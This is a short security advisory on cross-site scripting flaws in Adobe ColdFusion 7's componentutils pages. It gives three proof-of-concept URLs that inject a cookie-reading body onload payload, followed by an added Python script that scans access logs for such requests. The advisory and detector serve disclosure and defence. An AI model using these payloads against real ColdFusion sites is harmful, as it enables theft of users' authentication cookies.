"Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities"

Author: MustLive

Platform: cfm

Release date: 2011-09-27

source: https://www.securityfocus.com/bid/49787/info

Adobe ColdFusion is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.

An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Adobe ColdFusion 7 is vulnerable; other versions may also be affected.

http://example.com/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E

http://example.com/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E

http://example.com/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E
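The three proof-of-concept URLs above all put markup into query parameters of pages under `/CFIDE/componentutils/`. The following added example (not part of the advisory) shows one way a defender can spot such requests in web server access logs: it parses each request target, decodes the `component`, `method` and `name` parameters of the two affected pages, and flags any value that contains an HTML tag or inline event handler. The log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote
# Constructed sample access-log lines (not from the advisory); the first two
# carry the kind of payload the advisory's PoC URLs use, the third is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Sep/2011:10:01:02 +0000] "GET /CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E HTTP/1.1" 200 512
10.0.0.6 - - [27/Sep/2011:10:01:03 +0000] "GET /CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E HTTP/1.1" 200 640
10.0.0.7 - - [27/Sep/2011:10:01:04 +0000] "GET /CFIDE/componentutils/componentdetail.cfm?component=CFIDE.adminapi.base HTTP/1.1" 200 2048
"""

# Parameters the advisory's three PoC URLs show being reflected unescaped.
WATCHED = {
    "/cfide/componentutils/componentdetail.cfm": {"component"},
    "/cfide/componentutils/cfcexplorer.cfc": {"method", "name"},
}

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# An HTML tag or an inline event handler has no business in a component name.
MARKUP_RE = re.compile(r"<\s*/?[a-z]|\bon[a-z]+\s*=", re.IGNORECASE)

def suspicious_params(request_target):
    """Return the watched parameter names whose decoded value contains markup."""
    parts = urlsplit(request_target)
    watched = WATCHED.get(parts.path.lower())
    if not watched:
        return []
    hits = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() not in watched:
            continue
        # parse_qs decoded once; decode twice more so a double-encoded value is caught.
        if any(MARKUP_RE.search(unquote(unquote(v))) for v in values):
            hits.append(name)
    return sorted(hits)

def scan_log(text):
    """Return (client_ip, path, flagged_params) for each log line that matches."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        flagged = suspicious_params(m.group(1))
        if flagged:
            findings.append((line.split()[0], urlsplit(m.group(1)).path, flagged))
    return findings

if __name__ == "__main__":
    for ip, path, params in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} markup in: {','.join(params)}")
```

Requests to other paths, or to the affected pages with ordinary component names, are not flagged, so the check can run over a full log without drowning in noise.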